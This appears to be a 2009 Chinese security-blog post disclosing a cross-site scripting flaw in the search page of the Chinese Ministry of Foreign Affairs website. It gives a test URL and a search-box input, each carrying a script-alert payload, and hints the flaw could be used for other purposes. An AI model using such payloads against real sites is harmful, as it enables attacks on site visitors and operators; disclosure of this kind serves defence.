关注网络与数据安全

忘记密码
“游侠安全网”创建了网络安全从业者QQ大群(群号:389710688) ,欢迎各位同仁加入!有其它问题,请联系站长“网路游侠”,QQ:55984512


中国人民共和国外交部网站的一个跨站漏洞

2009-09-02 23:23 推荐: 浏览: 51字号:

摘要: 中华人民共和国外交部网站 http://www.fmprc.gov.cn 这个XSS漏洞不难利用,问题在 search.jsp 文件过滤不严格,且没有过滤post提交的数据,我们看看攻击的截图:或者这个:当然,用来做点别的也行…… 测试链接: http...

中华人民共和国外交部网站 http://www.fmprc.gov.cn

这个XSS漏洞不难利用,问题在 search.jsp 文件过滤不严格,且没有过滤post提交的数据,我们看看攻击的截图:

或者这个:

当然,用来做点别的也行……

测试链接:

http://www.fmprc.gov.cn/wjb/search.jsp?searchword=<script>alert('youxia')</script>

或在:

http://www.fmprc.gov.cn/wjb/search.jsp

搜索框中输入:

<script>alert('youxia')</script>

联系站长租广告位!

中国首席信息安全官